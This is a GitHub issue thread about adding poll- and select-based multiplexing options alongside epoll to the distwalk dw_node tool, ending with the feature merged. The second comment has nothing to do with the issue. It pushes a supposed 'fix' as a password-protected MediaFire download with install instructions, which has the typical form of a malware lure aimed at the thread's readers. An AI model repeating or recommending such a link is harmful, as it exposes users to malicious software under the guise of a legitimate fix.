### ISSUE TITLE
Allow dw_node to use various (e/p)poll/(p)select mechanisms for dealing with connections and messages from multiple clients

### ISSUE THREAD

**Issue by tomcucinotta** [tomcucinotta/distwalk#48]
Currently, dw_node supports epoll()-based communications, which is probably the most scalable primitive when dealing with a potentially high number of connected endpoints, albeit being only supported on Linux. A few other options we might want to support may be:
- using poll() or ppoll(), which might have similar scalability advantages to epoll(), but more portability;
- using select() or pselect().

The last option is probably the most popular and portable, however it suffers from possible scalability drawbacks with several endpoints, due to the need for the client to go through all the file descriptors in the pool, in order to find out which one changed state. On the other hand, a (p)poll() based loop might be more portable, albeit we should check whether we loose anything w.r.t. epoll().

This choice might be available through an option like
```
dw_node --multiplexing-mode=select|poll|epoll
```

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by tomcucinotta** [comment]
work-in-progress in branch dw_poll...

**Comment by tomcucinotta** [comment]
After the latest fixes, merging of the dw_poll branch in master, and the dedicated test-case addition, this is now done, can be closed.
